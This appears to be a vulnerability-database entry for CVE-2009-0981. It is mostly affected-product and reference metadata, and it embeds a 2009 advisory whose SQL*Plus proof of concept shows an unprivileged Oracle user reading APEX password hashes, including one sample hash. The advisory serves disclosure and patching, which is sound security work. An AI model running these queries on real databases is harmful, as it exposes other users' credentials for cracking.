ID
VAR-E-200904-0197
CVE
cve_id: | CVE-2009-0981 | Trust: 2.4 |
cve_id: | CVE-2009-0991 | Trust: 0.8 |
cve_id: | CVE-2009-0992 | Trust: 0.3 |
cve_id: | CVE-2009-0973 | Trust: 0.3 |
cve_id: | CVE-2009-1016 | Trust: 0.3 |
cve_id: | CVE-2009-1011 | Trust: 0.3 |
cve_id: | CVE-2009-0994 | Trust: 0.3 |
cve_id: | CVE-2009-1000 | Trust: 0.3 |
cve_id: | CVE-2009-1017 | Trust: 0.3 |
cve_id: | CVE-2009-0997 | Trust: 0.3 |
cve_id: | CVE-2009-1005 | Trust: 0.3 |
cve_id: | CVE-2009-0999 | Trust: 0.3 |
cve_id: | CVE-2009-0993 | Trust: 0.3 |
cve_id: | CVE-2009-1013 | Trust: 0.3 |
cve_id: | CVE-2009-0975 | Trust: 0.3 |
cve_id: | CVE-2009-0989 | Trust: 0.3 |
cve_id: | CVE-2009-1006 | Trust: 0.3 |
cve_id: | CVE-2009-0984 | Trust: 0.3 |
cve_id: | CVE-2009-0986 | Trust: 0.3 |
cve_id: | CVE-2009-0190 | Trust: 0.3 |
cve_id: | CVE-2009-0977 | Trust: 0.3 |
cve_id: | CVE-2009-0995 | Trust: 0.3 |
cve_id: | CVE-2009-0980 | Trust: 0.3 |
cve_id: | CVE-2009-1010 | Trust: 0.3 |
cve_id: | CVE-2009-1012 | Trust: 0.3 |
cve_id: | CVE-2009-0998 | Trust: 0.3 |
cve_id: | CVE-2009-0978 | Trust: 0.3 |
cve_id: | CVE-2009-1003 | Trust: 0.3 |
cve_id: | CVE-2009-0976 | Trust: 0.3 |
cve_id: | CVE-2009-0988 | Trust: 0.3 |
cve_id: | CVE-2009-0974 | Trust: 0.3 |
cve_id: | CVE-2009-1002 | Trust: 0.3 |
cve_id: | CVE-2009-0979 | Trust: 0.3 |
cve_id: | CVE-2009-1004 | Trust: 0.3 |
cve_id: | CVE-2009-1008 | Trust: 0.3 |
cve_id: | CVE-2009-0972 | Trust: 0.3 |
cve_id: | CVE-2009-0982 | Trust: 0.3 |
cve_id: | CVE-2009-0996 | Trust: 0.3 |
cve_id: | CVE-2009-1014 | Trust: 0.3 |
cve_id: | CVE-2009-0189 | Trust: 0.3 |
cve_id: | CVE-2009-1009 | Trust: 0.3 |
cve_id: | CVE-2009-1001 | Trust: 0.3 |
cve_id: | CVE-2009-0990 | Trust: 0.3 |
cve_id: | CVE-2009-0983 | Trust: 0.3 |
cve_id: | CVE-2009-0985 | Trust: 0.3 |
EDB ID
8456
TITLE
Oracle APEX 3.2 - Unprivileged DB users can see APEX Password hashes - Multiple local Exploit
Trust: 0.6
DESCRIPTION
Oracle APEX 3.2 - Unprivileged DB users can see APEX Password hashes. CVE-53738CVE-2009-0981 . local exploit for Multiple platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | oracle | model: | apex | scope: | eq | version: | 3.2 | Trust: 1.6 |
vendor: | oracle | model: | oracle11g standard edition | scope: | eq | version: | 11.16 | Trust: 0.6 |
vendor: | bea | model: | systems weblogic server | scope: | eq | version: | 10.3 | Trust: 0.6 |
vendor: | bea | model: | systems weblogic server | scope: | eq | version: | 10.0 | Trust: 0.6 |
vendor: | oracle | model: | rdbms tns listener | scope: | - | version: | - | Trust: 0.5 |
vendor: | apex | model: | password hash | scope: | - | version: | - | Trust: 0.5 |
vendor: | oracle | model: | xml publisher | scope: | eq | version: | 10.1.3.2.1 | Trust: 0.3 |
vendor: | oracle | model: | xml publisher | scope: | eq | version: | 5.6.2 | Trust: 0.3 |
vendor: | oracle | model: | xml publisher | scope: | eq | version: | 10.1.3.2 | Trust: 0.3 |
vendor: | oracle | model: | weblogic server | scope: | eq | version: | 10.3 | Trust: 0.3 |
vendor: | oracle | model: | peoplesoft enterprise peopletools | scope: | eq | version: | 8.49 | Trust: 0.3 |
vendor: | oracle | model: | peoplesoft enterprise hrms | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | oracle | model: | peoplesoft enterprise hrms | scope: | eq | version: | 8.9 | Trust: 0.3 |
vendor: | oracle | model: | outside in sdk html export | scope: | eq | version: | 8.3 | Trust: 0.3 |
vendor: | oracle | model: | outside in sdk html export | scope: | eq | version: | 8.2.2 | Trust: 0.3 |
vendor: | oracle | model: | oracle9i standard edition .8dv | scope: | eq | version: | 9.2 | Trust: 0.3 |
vendor: | oracle | model: | oracle9i standard edition | scope: | eq | version: | 9.2.8 | Trust: 0.3 |
vendor: | oracle | model: | oracle9i personal edition .8dv | scope: | eq | version: | 9.2 | Trust: 0.3 |
vendor: | oracle | model: | oracle9i personal edition | scope: | eq | version: | 9.2.8 | Trust: 0.3 |
vendor: | oracle | model: | oracle9i enterprise edition .8dv | scope: | eq | version: | 9.2 | Trust: 0.3 |
vendor: | oracle | model: | oracle9i enterprise edition | scope: | eq | version: | 9.2.8.0 | Trust: 0.3 |
vendor: | oracle | model: | oracle11g standard edition one | scope: | eq | version: | 11.16 | Trust: 0.3 |
vendor: | oracle | model: | oracle11g enterprise edition | scope: | eq | version: | 11.16 | Trust: 0.3 |
vendor: | oracle | model: | oracle11g enterprise edition | scope: | eq | version: | 11.1.0.7 | Trust: 0.3 |
vendor: | oracle | model: | oracle10g standard edition | scope: | eq | version: | 10.2.3 | Trust: 0.3 |
vendor: | oracle | model: | oracle10g standard edition | scope: | eq | version: | 10.1.5 | Trust: 0.3 |
vendor: | oracle | model: | oracle10g standard edition | scope: | eq | version: | 10.2.0.4 | Trust: 0.3 |
vendor: | oracle | model: | oracle10g personal edition | scope: | eq | version: | 10.2.3 | Trust: 0.3 |
vendor: | oracle | model: | oracle10g personal edition | scope: | eq | version: | 10.1.5 | Trust: 0.3 |
vendor: | oracle | model: | oracle10g personal edition | scope: | eq | version: | 10.2.0.4 | Trust: 0.3 |
vendor: | oracle | model: | oracle10g enterprise edition | scope: | eq | version: | 10.2.3 | Trust: 0.3 |
vendor: | oracle | model: | oracle10g enterprise edition | scope: | eq | version: | 10.1.5 | Trust: 0.3 |
vendor: | oracle | model: | oracle10g enterprise edition | scope: | eq | version: | 10.2.0.4 | Trust: 0.3 |
vendor: | oracle | model: | oracle10g application server | scope: | eq | version: | 10.1.2 | Trust: 0.3 |
vendor: | oracle | model: | oracle10g application server | scope: | eq | version: | 10.1.2.3.0 | Trust: 0.3 |
vendor: | oracle | model: | jrockit r27.6.2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | oracle | model: | jrockit r27.6.0 | scope: | - | version: | - | Trust: 0.3 |
vendor: | oracle | model: | jrockit r27.1.0 | scope: | - | version: | - | Trust: 0.3 |
vendor: | oracle | model: | e-business suite 11i | scope: | eq | version: | 11.5.10.2 | Trust: 0.3 |
vendor: | oracle | model: | e-business suite | scope: | eq | version: | 12.0.6 | Trust: 0.3 |
vendor: | oracle | model: | data service integrator | scope: | eq | version: | 10.3 | Trust: 0.3 |
vendor: | oracle | model: | bi publisher | scope: | eq | version: | 10.1.3.4 | Trust: 0.3 |
vendor: | oracle | model: | bi publisher | scope: | eq | version: | 10.1.3.3.3 | Trust: 0.3 |
vendor: | oracle | model: | bi publisher | scope: | eq | version: | 10.1.3.3.2 | Trust: 0.3 |
vendor: | oracle | model: | bi publisher | scope: | eq | version: | 10.1.3.3.1 | Trust: 0.3 |
vendor: | oracle | model: | bi publisher | scope: | eq | version: | 10.1.3.3.0 | Trust: 0.3 |
vendor: | oracle | model: | audit vault | scope: | eq | version: | 10.2.3 | Trust: 0.3 |
vendor: | oracle | model: | aqualogic data services platform | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | oracle | model: | aqualogic data services platform | scope: | eq | version: | 3.2 | Trust: 0.3 |
vendor: | oracle | model: | aqualogic data services platform | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 8.16 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 8.15 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 8.14 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 8.13 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 8.12 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 8.11 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 7.0.0.14 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 7.0.0.13 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 7.0.0.12 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 7.0.0.11 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server | scope: | eq | version: | 7.0.0.1 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 7.07 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 7.06 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 7.05 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 7.04 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 7.03 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 7.02 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp | scope: | eq | version: | 7.01 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server maintenance pack | scope: | eq | version: | 9.2 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server | scope: | eq | version: | 9.2 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server | scope: | eq | version: | 9.1 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server sp7 | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic server mp1 | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic portal sp6 | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic portal sp5 | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic portal sp4 | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic portal sp3 | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic portal sp2 | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic portal sp1 | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | bea | model: | systems weblogic portal | scope: | eq | version: | 8.1 | Trust: 0.3 |
EXPLOIT
Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]
Name Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981]
Systems Affected APEX 3.0 (optional component of 11.1.0.7 installation)
Severity High Risk
Category Password Disclosure
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
CVE CVE-2009-0981
Advisory 14 April 2009 (V 1.00)
Details
Unprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER.
Tested on 11.1.0.7.
C:\> sqlplus dummy/dummy
Connected to:
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> select granted_role from user_role_privs;
GRANTED_ROLE
------------------------------
CONNECT
SQL> select owner,table_name from all_tables where owner='FLOWS_030000';
OWNER TABLE_NAME
------------------------------ ------------------------------
FLOWS_030000 WWV_FLOW_DUAL100
FLOWS_030000 WWV_FLOW_LOV_TEMP
FLOWS_030000 WWV_FLOW_TEMP_TABLE
Get a list of all columns containing the string "%PASSWORD%'
SQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%';
OWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME
--------------------------------------------------------------------------------
FLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE
FLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2
FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT
FLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE
9 rows selected.
SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS
USER_NAME WEB_PASSWORD2
--------------------------------------------------------------------------------
YURI 141FA790354FB6C72802FDEA86353F31
This password hash can be checked using a tool like Repscan.
Patch Information
Apply the patches for Oracle CPU April 2009.
History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published
# milw0rm.com [2009-04-16]
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Unprivileged DB users can see APEX Password hashes
Trust: 1.6
TAGS
tag: | exploit | Trust: 1.0 |
tag: | proof of concept | Trust: 0.5 |
tag: | info disclosure | Trust: 0.5 |
CREDITS
Alexander Kornbrust
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2009-0981 | Trust: 2.4 |
db: | EXPLOIT-DB | id: | 8456 | Trust: 1.6 |
db: | NVD | id: | CVE-2009-0988 | Trust: 0.9 |
db: | NVD | id: | CVE-2009-0991 | Trust: 0.8 |
db: | EDBNET | id: | 32675 | Trust: 0.6 |
db: | EDBNET | id: | 68211 | Trust: 0.6 |
db: | PACKETSTORM | id: | 76855 | Trust: 0.5 |
db: | PACKETSTORM | id: | 76731 | Trust: 0.5 |
db: | ZDI | id: | ZDI-09-017 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0992 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0973 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1016 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1011 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0994 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1000 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1017 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0997 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1005 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0999 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0993 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1013 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0975 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0989 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1006 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0984 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0986 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0190 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0977 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0995 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0980 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1010 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1012 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0998 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0978 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1003 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0976 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0974 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1002 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0979 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1004 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1008 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0972 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0982 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0996 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1014 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0189 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1009 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-1001 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0990 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0983 | Trust: 0.3 |
db: | NVD | id: | CVE-2009-0985 | Trust: 0.3 |
db: | BID | id: | 34461 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2009-0981 | Trust: 2.1 |
url: | https://www.exploit-db.com/exploits/8456/ | Trust: 0.6 |
url: | https://www.intelligentexploit.com | Trust: 0.6 |
url: | https://nvd.nist.gov/vuln/detail/cve-2009-0991 | Trust: 0.5 |
url: | http://www.zerodayinitiative.com/advisories/zdi-09-017/ | Trust: 0.3 |
url: | http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqin.html | Trust: 0.3 |
url: | http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html | Trust: 0.3 |
url: | http://secunia.com/secunia_research/2009-22/ | Trust: 0.3 |
url: | http://secunia.com/secunia_research/2009-23/ | Trust: 0.3 |
url: | http://www.oracle.com/technology/deploy/security/wls-security/1016.html | Trust: 0.3 |
url: | http://www.oracle.com/technology/deploy/security/wls-security/1012.html | Trust: 0.3 |
url: | http://www.red-database-security.com/advisory/apex_password_hashes.html | Trust: 0.3 |
url: | http://www.oracle.com/technology/deploy/security/wls-security/1004.html | Trust: 0.3 |
url: | http://www.oracle.com/technology/deploy/security/wls-security/1002.html | Trust: 0.3 |
url: | http://www.oracle.com/technology/deploy/security/wls-security/1006.html | Trust: 0.3 |
url: | http://www.oracle.com/technology/deploy/security/wls-security/1003.html | Trust: 0.3 |
url: | http://www.appsecinc.com/resources/alerts/oracle/2009-03.shtml | Trust: 0.3 |
url: | http://www.oracle.com/technology/deploy/security/wls-security/1001.html | Trust: 0.3 |
url: | http://www.oracle.com/technology/deploy/security/wls-security/1005.html | Trust: 0.3 |
url: | http://www.oracle.com | Trust: 0.3 |
url: | http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqadm_sys.html | Trust: 0.3 |
SOURCES
db: | BID | id: | 34461 |
db: | PACKETSTORM | id: | 76855 |
db: | PACKETSTORM | id: | 76731 |
db: | EXPLOIT-DB | id: | 8456 |
db: | EDBNET | id: | 32675 |
db: | EDBNET | id: | 68211 |
LAST UPDATE DATE
2022-07-27T09:19:54.370000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 34461 | date: | 2009-09-01T16:22:00 |
SOURCES RELEASE DATE
db: | BID | id: | 34461 | date: | 2009-04-09T00:00:00 |
db: | PACKETSTORM | id: | 76855 | date: | 2009-04-21T18:08:37 |
db: | PACKETSTORM | id: | 76731 | date: | 2009-04-16T21:55:38 |
db: | EXPLOIT-DB | id: | 8456 | date: | 2009-04-16T00:00:00 |
db: | EDBNET | id: | 32675 | date: | 2009-04-16T00:00:00 |
db: | EDBNET | id: | 68211 | date: | 2009-08-28T00:00:00 |